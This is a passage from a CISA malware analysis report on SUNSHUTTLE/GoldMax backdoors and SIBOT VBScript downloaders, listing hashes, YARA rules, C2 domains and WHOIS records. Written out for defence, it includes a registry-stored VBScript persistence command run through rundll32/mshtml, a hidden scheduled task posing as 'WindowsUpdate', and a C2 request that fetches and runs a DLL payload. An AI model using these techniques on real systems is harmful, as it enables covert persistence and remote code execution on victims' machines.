1620703932_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.namesilo.com\r\nRegistrar URL: http://www.namesilo.com\r\nUpdated Date: 2020-04-30T08:57:06Z\r\nCreation Date: 2010-10-16T18:54:19Z\r\nRegistry Expiry Date: 2021-10-16T18:54:19Z\r\nRegistrar: NameSilo, LLC\r\nRegistrar IANA ID: 1479\r\nRegistrar Abuse Contact Email: abuse@namesilo.com\r\nRegistrar Abuse Contact Phone: +1.4805240066\r\nDomain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited\r\nName Server: NS1.CP-19.WEBHOSTBOX.NET\r\nName Server: NS2.CP-19.WEBHOSTBOX.NET\r\nDNSSEC: unsigned\r\nURL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/\r\n\u003e\u003e\u003e Last update of whois database: 2021-03-04T17:32:23Z \u003c\r\nRelationships\r\nreyweb.com Connected_From 94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45\r\nDescription\r\n\"Lexicon.exe\" (b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8) attempts to connect to this\r\ndomain.\r\nec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def\r\nTags\r\ntrojan\r\nDetails\r\nName SchCachedSvc.exe\r\nSize 2037248 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 3efff3415e878d8f23f3c51cf1acfd1b\r\nSHA1 81cbbd07e8cd7ac171590304946003f9c02f5164\r\nSHA256 ec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def\r\nSHA512 d15f14af7dbe77d956adb05b3d4d67b401cb068a31392c45f64b2fe5a213a6f60bce4656d49375443ef165e276ccb5e98ce0c45b16842c3b2\r\nssdeep 49152:AbHM13VNy7Pcp00wMpC7+UuqGkyH0NFcCFqko37hWq:AbHexxwMpC7+Uuf7yaES7hWq\r\nEntropy 7.874807\r\nAntivirus\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 23 of 44\n\nBitDefender Gen:Variant.Bulz.370300\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Gen:Variant.Bulz.370300 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.370300\r\nMicrosoft Security Essentials Trojan:Win64/GoldMax.A!dha\r\nSophos Mal/GoldMax-A\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nc48f92bd3dd2069ef2edcdb22bd65fa1 header 512 2.494140\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n0aaa15e9aae3304d555536a90dab1223 UPX1 2036224 7.875386\r\n8b4f623319b09fd4b7d5fcdc5179f6ee UPX2 512 1.763456\r\nRelationships\r\nec5f07c169... Connected_To nikeoutletinc.org\r\nDescription\r\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified as SUNSHUTTLE/Goldmax\r\nmalware.\r\nOn execution, the behavior is nearly identical to bootcats.exe\r\n(4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec). It produced the same number of events, with\r\nonly slight variation in order of file names. It is likely another iteration of this sample.\r\nUpon execution, drops file “config.data.tmp” in the same directory the executable is running. Sample filename mimics the\r\nname of other benign windows service executable. Initiates encrypted network traffic to “nikeoutletinc.org” using TLSv1.3\r\nto create a secure connection with C2. config.data.tmp is encrypted using a key unique to each sample, but based on\r\nprevious reporting it is almost certainly a configuration file. If the file does not already exist in the same directory as the\r\nmalware, it will be created at runtime.\r\nFile is packed with UPX. Displayed below is a string of interest:\r\n--Begin string of interest--\r\nGo build ID: \"yytqyhV7XNSuSZRXAADu/FzAnsR7anW_XvSXcBCS2/4f91rfQD47Q6E02u8kC8/_t-YMsh7fECr1GVsP3F7x\"\r\nhxxps[:]//cdn.bootstrap.com/id (%v) \u003c= evictCount (%v)initSpan: unaligned lengthinvalid argument to Int31ninvalid\r\nargument to Int63ninvalid port %q after hostinvalid request descriptormalformed HTTP status codemalformed chunked\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 24 of 44\n\nencodingname not unique on network\r\n--End string of interest--\r\n4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName bootcats.exe\r\nSize 5178368 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 7f3a0c0a72b661ad8eaf579789530634\r\nSHA1 d11a1fa8811781ad17253d47f23044994f691739\r\nSHA256 4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nSHA512 fed911ea264ca3f69fd28b4ce808fc185732ad99bb4b5f9167103e76694d4306a5f3af1d1b9aca5074b2aa72b2ec4909495cb2a018c0f47515\r\nssdeep 49152:YQ4uataXvwDOvdk6NDv0U/u3BT1OZutqIpYFDkciESn1KNJQvJiLxETsL0qoIqxk:L5gOwOq6NYbSZutqIpYIcmvpw7+A\r\nEntropy 5.960173\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.370300\r\nClamAV Win.Malware.SUNSHUTTLE-9838970-0\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Gen:Variant.Bulz.370300 (B)\r\nIkarus Trojan.Crypter\r\nLavasoft Gen:Variant.Bulz.370300\r\nMicrosoft Security Essentials Trojan:Win64/GoldMax.A!dha\r\nSophos Mal/GoldMax-A\r\nSystweak trojan-backdoor.sunshuttle-r\r\nYARA Rules\r\nrule CISA_3P_10327841_02 : SOLARFLARE trojan\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841.r1.v1\"\r\n       Date = \"2021-03-04\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan\"\r\n       Family = \"SOLARFLARE\"\r\n       Description = \"Detects strings in WindowsDSVC_exe samples\"\r\n       MD5_1 = \"4de28110bfb88fdcdf4a0133e118d998\"\r\n       SHA256_1 = \"fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\"\r\n   strings:\r\n       $Go_Lang = \"Go build ID:\"\r\n       $main_func = \"main.main\"\r\n       $main_encrypt = \"main.encrypt\"\r\n       $main_MD5 = \"main.GetMD5Hash\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 25 of 44\n\n$main_beacon = \"main.beaconing\"\r\n       $main_command = \"main.resolve_command\"\r\n       $main_key1 = \"main.request_session_key\"\r\n       $main_key2 = \"main.retrieve_session_key\"\r\n       $main_clean = \"main.clean_file\"\r\n       $main_wget = \"main.wget_file\"\r\n   condition:\r\n       (uint16(0) == 0x5A4D) and all of them\r\n}\r\nrule FireEye_21_00004531_01 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"main.request_session_key\"\r\n       $s2 = \"main.define_internal_settings\"\r\n       $s3 = \"main.send_file_part\"\r\n       $s4 = \"main.clean_file\"\r\n       $s5 = \"main.send_command_result\"\r\n       $s6 = \"main.retrieve_session_key\"\r\n       $s7 = \"main.save_internal_settings\"\r\n       $s8 = \"main.resolve_command\"\r\n       $s9 = \"main.write_file\"\r\n       $s10 = \"main.beaconing\"\r\n       $s11 = \"main.wget_file\"\r\n       $s12 = \"main.fileExists\"\r\n       $s13 = \"main.removeBase64Padding\"\r\n       $s14 = \"main.addBase64Padding\"\r\n       $s15 = \"main.delete_empty\"\r\n       $s16 = \"main.GetMD5Hash\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (5 of them)\r\n}\r\nrule FireEye_21_00004531_02 : SUNSHUTTLE backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2021-03-04\"\r\n       Last_Modified = \"20210305_1704\"\r\n       Actor = \"UNC2452\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNSHUTTLE\"\r\n       Description = \"This rule detects strings found in SUNSHUTTLE\"\r\n       MD5_1 = \"9466c865f7498a35e4e1a8f48ef1dffd\"\r\n       SHA256_1 = \"b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8\"\r\n   strings:\r\n       $s1 = \"LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk\"\r\n       $s2 = \"LS0tLS1FTkQgUFJJVkFURSBLRVktLS0tLQ\"\r\n       $s3 = \"Go build ID: \\\"\"\r\n   condition:\r\n       filesize\u003c10MB and uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of them\r\n}\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 26 of 44\n\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n7a1607fa13e952f0074d14da6640799e header 1536 1.254058\r\n82e920a576c08a7fff8d28fe7f3e93a4 .text 2402816 5.901993\r\n7c4531cb3e331f4a36a1ac2b77022169 .rdata 2511360 5.340532\r\n69aaf44b0f374f9e66eb65c779a77528 .data 260608 5.551012\r\nf981b67cbc5a081af39bedc1eb2fe60b .idata 1536 3.414430\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nRelationships\r\n4e8f24fb50... Connected_To megatoolkit.com\r\n4e8f24fb50... Dropped bc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df\r\nDescription\r\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified as SUNSHUTTLE/Goldmax\r\nmalware. It is unique in that it does not appear to be packed, unlike other GoldMax samples, which were packed with UPX.\r\nIt was observed beginning to beacon after remediation efforts began on the compromised network.\r\nUpon execution, drops file “runlog.dat.tmp” (bc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df) in\r\nthe same directory the executable is running. Sample filename mimics the name of other benign windows service\r\nexecutable. Initiates encrypted network traffic to “megatoolkit.com” using TLSv1.3 to create a secure connection with C2.\r\nRunlog.dat.tmp is encrypted using a key unique to each sample, but based on previous reporting it is almost certainly a\r\nconfiguration file. If the file does not already exist in the same directory as the malware, it will be created at runtime.\r\nmegatoolkit.com\r\nTags\r\ncommand-and-control\r\nURLs\r\nmegatoolkit.com/catalog/\r\nmegatoolkit.com/icon.ico\r\nmegatoolkit.com/icon.pngi19TotqC9iD8Y0B7jcGnpp5hYcyjg4cL\r\nWhois\r\nDomain Name: megatoolkit.com\r\nRegistry Domain ID: 2344043124_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.namesilo.com\r\nRegistrar URL: https://www.namesilo.com/\r\nUpdated Date: 2020-12-16T07:00:00Z\r\nCreation Date: 2018-12-17T07:00:00Z\r\nRegistrar Registration Expiration Date: 2022-12-17T07:00:00Z\r\nRegistrar: NameSilo, LLC\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 27 of 44\n\nRegistrar IANA ID: 1479\r\nRegistrar Abuse Contact Email: abuse@namesilo.com\r\nRegistrar Abuse Contact Phone: +1.4805240066\r\nDomain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited\r\nRegistry Registrant ID:\r\nRegistrant Name: Domain Administrator\r\nRegistrant Organization: See PrivacyGuardian.org\r\nRegistrant Street: 1928 E. Highland Ave. Ste F104 PMB# 255\r\nRegistrant City: Phoenix\r\nRegistrant State/Province: AZ\r\nRegistrant Postal Code: 85016\r\nRegistrant Country: US\r\nRegistrant Phone: +1.3478717726\r\nRegistrant Phone Ext:\r\nRegistrant Fax:\r\nRegistrant Fax Ext:\r\nRegistrant Email: pw-82f809367ca4aef6cfb7b46bcb7f880c@privacyguardian.org\r\nRegistry Admin ID:\r\nAdmin Name: Domain Administrator\r\nAdmin Organization: See PrivacyGuardian.org\r\nAdmin Street: 1928 E. Highland Ave. Ste F104 PMB# 255\r\nAdmin City: Phoenix\r\nAdmin State/Province: AZ\r\nAdmin Postal Code: 85016\r\nAdmin Country: US\r\nAdmin Phone: +1.3478717726\r\nAdmin Phone Ext:\r\nAdmin Fax:\r\nAdmin Fax Ext:\r\nAdmin Email: pw-82f809367ca4aef6cfb7b46bcb7f880c@privacyguardian.org\r\nRegistry Tech ID:\r\nTech Name: Domain Administrator\r\nTech Organization: See PrivacyGuardian.org\r\nTech Street: 1928 E. Highland Ave. Ste F104 PMB# 255\r\nTech City: Phoenix\r\nTech State/Province: AZ\r\nTech Postal Code: 85016\r\nTech Country: US\r\nTech Phone: +1.3478717726\r\nTech Phone Ext:\r\nTech Fax:\r\nTech Fax Ext:\r\nTech Email: pw-82f809367ca4aef6cfb7b46bcb7f880c@privacyguardian.org\r\nName Server: NS1.DNSOWL.COM\r\nName Server: NS2.DNSOWL.COM\r\nName Server: NS3.DNSOWL.COM\r\nDNSSEC: unsigned\r\nURL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/\r\nRelationships\r\nmegatoolkit.com Connected_From 4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nDescription\r\nbootcats.exe (4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec) attempts to connect to this\r\ndomain.\r\nbc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df\r\nDetails\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 28 of 44\n\nName runlog.dat.tmp\r\nSize 235 bytes\r\nType ASCII text, with no line terminators\r\nMD5 aaf144c8c647a0f7f807e203921dc244\r\nSHA1 510336020a32652cb65891ad9fde3b2a60f9a768\r\nSHA256 bc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df\r\nSHA512 6a861468536c83626a0636adc517a48e4a5a022fea6f1e28bde3a43b1121d5b98734533e2f8c1943d9c5e075597139cd34ae6f5e1f75f9981a\r\nssdeep 3:oc2XPd1k1NjViOUjQ3EGqqxBo2JsKGNoLYWBiUvxwy3zeaDKkUg+mTe8G9t4WrQ8:52fdWHj47sYqHls7Wra/kU5MeX0ST7v\r\nEntropy 5.800454\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\nbc7a3b3cfa... Dropped_By 4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec\r\nDescription\r\nThis file is a text file that was dropped by bootcats.exe. Runlog.dat.tmp is encrypted using a key unique to each sample, but\r\nbased on previous reporting it is almost certainly a configuration file. If the file does not already exist in the same directory\r\nas the malware, it will be created at runtime.\r\n7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb\r\nTags\r\nbotdownloaderloadertrojan\r\nDetails\r\nName rundll32registry_createremoteregistry.vbs\r\nSize 26789 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 4fd640185f229d0ef142899c54024615\r\nSHA1 3d3ccd9445aeb07499a91250686c84a737bfa013\r\nSHA256 7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb\r\nSHA512 44fb8d7c2e19c3d3f135583e818532ec2db42e0b9f548e38fd44939a574af123521051eadcecbcf70908383bb27f92c55b2a8bacf07995c5b9\r\nssdeep 384:zYxnffSvor4lD1ok0JQCnaUfDnFO1AnKAn/jUfFYtYEYBhj:46/ok09tUfFYtYEYBhj\r\nEntropy 3.305791\r\nAntivirus\r\nMicrosoft Security Essentials TrojanDownloader:VBS/Sibot.A!dha\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 29 of 44\n\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a VBscript that has been identified a variant of MISPRINT/SIBOT malware designed to install an obfuscated\r\nsecond stage VBScript into the Windows registry keys below:\r\n--Begin registry keys--\r\nhKey = HKEY_LOCAL_MACHINE\r\nSubkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot\"\r\nValueName = \"(Default)\"\r\nData =    \"obfuscated second stage VBScript\"\r\n--End registry keys--\r\nThe embedded VBScript is executed by \"rundll32registry_schtaskdaily.vbs\r\n(acc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66).\r\n\"Final_vbscript.vbs\" (a9037af30ff270901e9d5c2ee5ba41d547bc19c880f5cb27f50428f9715d318f) is the de-obfuscated\r\nVBScript.\r\nScreenshots\r\nFigure 2 - The content of the script used to install an obfuscated second stage VBScript malware into the Windows registry\r\nkeys.\r\nFigure 3 - The registry key value containing the obfuscated second stage VBscript.\r\nacc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66\r\nTags\r\nbottrojan\r\nDetails\r\nName rundll32registry_schtaskdaily.vbs\r\nSize 3409 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 15b3856e59a242577d83275279ed70e0\r\nSHA1 65d3a466d65e6f7df813f83c25d828e04488a1c7\r\nSHA256 acc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66\r\nSHA512 714d76e8da8d9016ef7b7351d67dba0c7a24930bad52958b86a05ff878d6506edbed48076a6f245cff1eb670dd75b0c5d317717cd494b0a55\r\nssdeep 96:xCKjZrAuFT3M6tsKXbdUKrsGrkLgTe1HDM3wmD2GQ09LUF:rLFwNsseyvV058\r\nEntropy 5.608919\r\nAntivirus\r\nBitDefender Trojan.Agent.FEBT\r\nEmsisoft Trojan.Agent.FEBT (B)\r\nLavasoft Trojan.Agent.FEBT\r\nMicrosoft Security Essentials Trojan:VBS/Sibot.B!dha\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 30 of 44\n\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nDescription\r\nThis file is a VBscript that has been identified a variant of MISPRINT/SIBOT malware designed to create a schedule task\r\nservice that uses Microsoft HTML Application (MSHTA) to execute the obfuscated second stage VBScript\r\n(7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb) from the Windows registry key:\r\n\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot.\"\r\nDisplayed below is the schedule task service information:\r\n--Begin schedule task--\r\nName: \"WindowsUpdate\"    \r\nDescription: \"This boot task launches the SIH client to finish executing healing actions to fix the system components vital to\r\nautomatic updating of Windows and Microsoft software installed on the machine. It is enabled only when the daily SIH\r\nclient task fails to c\"\r\nArguments: \"vbscript:\\\"\\\\..\\\\mshtml,RunHTMLApplication\r\n\\\"+Execute(CreateObject(\\\"WScript.Shell\\\").RegRead(\\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\sibot\\\\\\\"))\r\n(window.close)\"\r\nPath: rundll32\r\n--End schedule task--\r\nIt runs the command below daily:\r\n--Begin command--\r\n\"rundll32 vbscript:\\\"\\\\..\\\\mshtml,RunHTMLApplication\r\n\\\"+Execute(CreateObject(\\\"WScript.Shell\\\").RegRead(\\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\sibot\\\\\\\"))\r\n(window.close)\"\r\n--End command--\r\nDisplayed below is the content of the script daily scheduled task Extensible Markup Language (XML) created at the time of\r\nanalysis:\r\n--Begin scheduled task XML--\r\n\u003c?xml version=\\\"1.0\\\" encoding=\\\"UTF-16\\\"?\u003e\\r\\n\r\n\u003cTask version=\\\"1.2\\\"\r\n   xmlns=\\\"hxxp[:]//schemas.microsoft.com/windows/2004/02/mit/task\\\"\u003e\\r\\n\r\n   \u003cRegistrationInfo\u003e\\r\\n    \r\n       \u003cDescription\u003eThis boot task launches the SIH client to finish executing healing actions to fix the system components\r\nvital to automatic updating of Windows and Microsoft software installed on the machine. It is enabled only when the daily\r\nSIH client task fails to c\u003c/Description\u003e\\r\\n\r\n   \u003c/RegistrationInfo\u003e\\r\\n\r\n   \u003cTriggers\u003e\\r\\n    \r\n       \u003cCalendarTrigger id=\\\"DailyTriggerId\\\"\u003e\\r\\n    \r\n           \u003cStartBoundary\u003e2021-03-12T18:27:56\u003c/StartBoundary\u003e\\r\\n    \r\n           \u003cExecutionTimeLimit\u003ePT10M\u003c/ExecutionTimeLimit\u003e\\r\\n    \r\n           \u003cEnabled\u003etrue\u003c/Enabled\u003e\\r\\n    \r\n           \u003cScheduleByDay\u003e\\r\\n        \r\n               \u003cDaysInterval\u003e1\u003c/DaysInterval\u003e\\r\\n    \r\n           \u003c/ScheduleByDay\u003e\\r\\n    \r\n       \u003c/CalendarTrigger\u003e\\r\\n\r\n   \u003c/Triggers\u003e\\r\\n\r\n   \u003cPrincipals\u003e\\r\\n    \r\n       \u003cPrincipal\u003e\\r\\n    \r\n           \u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\\r\\n    \r\n       \u003c/Principal\u003e\\r\\n\r\n   \u003c/Principals\u003e\\r\\n\r\n   \u003cSettings\u003e\\r\\n    \r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 31 of 44\n\n\u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\\r\\n    \r\n       \u003cDisallowStartIfOnBatteries\u003etrue\u003c/DisallowStartIfOnBatteries\u003e\\r\\n    \r\n       \u003cStopIfGoingOnBatteries\u003etrue\u003c/StopIfGoingOnBatteries\u003e\\r\\n    \r\n       \u003cAllowHardTerminate\u003etrue\u003c/AllowHardTerminate\u003e\\r\\n    \r\n       \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\\r\\n    \r\n       \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\\r\\n    \r\n       \u003cIdleSettings\u003e\\r\\n    \r\n           \u003cDuration\u003ePT10M\u003c/Duration\u003e\\r\\n    \r\n           \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\\r\\n    \r\n           \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\\r\\n    \r\n           \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\\r\\n    \r\n       \u003c/IdleSettings\u003e\\r\\n    \r\n       \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\\r\\n    \r\n       \u003cEnabled\u003etrue\u003c/Enabled\u003e\\r\\n    \r\n       \u003cHidden\u003etrue\u003c/Hidden\u003e\\r\\n    \r\n       \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\\r\\n    \r\n       \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\\r\\n    \r\n       \u003cExecutionTimeLimit\u003ePT72H\u003c/ExecutionTimeLimit\u003e\\r\\n    \r\n       \u003cPriority\u003e7\u003c/Priority\u003e\\r\\n\r\n   \u003c/Settings\u003e\\r\\n\r\n   \u003cActions\u003e\\r\\n    \r\n       \u003cExec\u003e\\r\\n    \r\n           \u003cCommand\u003erundll32\u003c/Command\u003e\\r\\n    \r\n           \u003cArguments\u003evbscript:\\\"\\\\..\\\\mshtml,RunHTMLApplication\r\n\\\"+Execute(CreateObject(\\\"WScript.Shell\\\").RegRead(\\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\sibot\\\\\\\"))\r\n(window.close)\u003c/Arguments\u003e\\r\\n    \r\n       \u003c/Exec\u003e\\r\\n\r\n   \u003c/Actions\u003e\\r\\n\r\n\u003c/Task\u003e\"\r\n--End scheduled task XML--\r\nScreenshots\r\nFigure 4 - The content of the vbscript used to create the schedule task service.\r\n88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07\r\nTags\r\nbotdownloaderloadertrojan\r\nDetails\r\nName prnmngrz.vbs\r\nSize 13660 bytes\r\nType ASCII text, with very long lines, with CRLF line terminators\r\nMD5 9812bb73079a739b97f2c3927ad764ba\r\nSHA1 bec3f2a9496a0f11696debf267ba7caf1c81a9a7\r\nSHA256 88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07\r\nSHA512 c6ff6f40c13cd0d60576e06259579af8f087f1a1a0e70429c4ae40feb3156c626b1b43c1072bb7b693c55236d69f00bdefdd062f22b2bcaa9cc\r\nssdeep 192:bz7Zhi5jjOB5U1WTQ7dkGixbKOXUHiMLNYy+n8C:bZB8WqaaOXUHiMLNYrnp\r\nEntropy 4.988488\r\nAntivirus\r\nMicrosoft Security Essentials TrojanDownloader:VBS/Sibot.A!dha\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 32 of 44\n\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n88cd1bc85e... Connected_To eyetechltd.com\r\nDescription\r\nThis file contains the obfuscated VBScript and has been identified a variant of MISPRINT/SIBOT malware. When executed,\r\nit collects the connection Globally Unique Identifier (GUID) associated to the local area network (LAN) connection and the\r\naddress of a proxy if configured on the victim's system. It attempts to download a malicious payload from its C2 server\r\nusing the URI below:\r\n--Begin URI--\r\n\"hxxps[:]//www[.]eyetechltd.com/wp-content/themes/betheme/includes\"\r\n--End URI--\r\nThe HTTP request header contains the extracted connection GUID in the \"If-Range\" field.\r\nDisplayed below is the HTTP request used to download the payload from its C2 server:\r\n--Begin request--\r\nGET /wp-content/themes/betheme/includes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nIf-Range: AACF144C-0770-4FE3-B92B-A4BE71D2F9B9\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/78.0.3904.108 Safari/537.36\r\nHost: www[.]eyetechltd.com\r\n--End request--\r\nThe payload was not available for analysis. Analysis indicates that the downloaded payload (DLL) will be installed and\r\nexecuted from \"c:\\windows\\system32\\drivers\\mshidkmdfc.sys\" with the command below:\r\n--Begin command--\r\n\"rundll32 mshidkmdfc.sys,Control_DllRun\"\r\n--End command--\r\nDisplayed below are sample de-obfuscated strings from the script:\r\n--Begin strings--\r\n\"USER-AGENT\"\r\n\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108\r\nSafari/537.36\"\r\n\"If-Range\"\r\n\"WINMGMTS:{IMPERSONATIONLEVEL=IMPERSONATE}!\\\\\\\\.\\\\ROOT\\\\DEFAULT:STDREGPROV\"\r\n\"WINMGMTS:{IMPERSONATIONLEVEL=IMPERSONATE}!\\\\\\\\.\\\\ROOT\\\\MICROSOFT\\\\HOMENET\"\r\n\"SOFTWARE\\\\MICROSOFT\\\\WINDOWS\\\\CURRENTVERSION\\\\INTERNET SETTINGS\"\r\n\"PROXYENABLE\"\r\n\"rundll32 mshidkmdfc.sys,Control_DllRun\"\r\n\"c:\\\\windows\\\\system32\\\\drivers\"\r\n\"https[:]//www[.]eyetechltd.com/wp-content/themes/betheme/includes\"\r\n\"MSXML2.SERVERXMLHTTP.6.0\"\r\n\"WINHTTP.WINHTTPREQUEST.5.1\"\r\n\"SELECT * FROM HNET_CONNECTION\"\r\n\"GET\"\r\n--End strings--\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 33 of 44\n\nScreenshots\r\nFigure 5 - The content of the VBscript used to download a malicious payload from its C2 server.\r\neyetechltd.com\r\nTags\r\ncommand-and-control\r\nURLs\r\neyetechltd.com/wp-content/themes/betheme/includes\r\nPorts\r\n443 TCP\r\nHTTP Sessions\r\nGET /wp-content/themes/betheme/includes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nIf-Range: AACF144C-0770-4FE3-B92B-A4BE71D2F9B9\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/78.0.3904.108 Safari/537.36\r\nHost: www[.]eyetechltd.com\r\nWhois\r\nDomain Name: EYETECHLTD.COM\r\nRegistry Domain ID: 135677917_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.tucows.com\r\nRegistrar URL: http://tucowsdomains.com\r\nUpdated Date: 2020-07-30T09:39:33\r\nCreation Date: 2004-11-23T16:54:52\r\nRegistrar Registration Expiration Date: 2022-11-23T16:54:52\r\nRegistrar: TUCOWS, INC.\r\nRegistrar IANA ID: 69\r\nReseller: OnDNet Services Ltd\r\nDomain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited\r\nDomain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited\r\nRegistry Registrant ID:\r\nRegistrant Name: REDACTED FOR 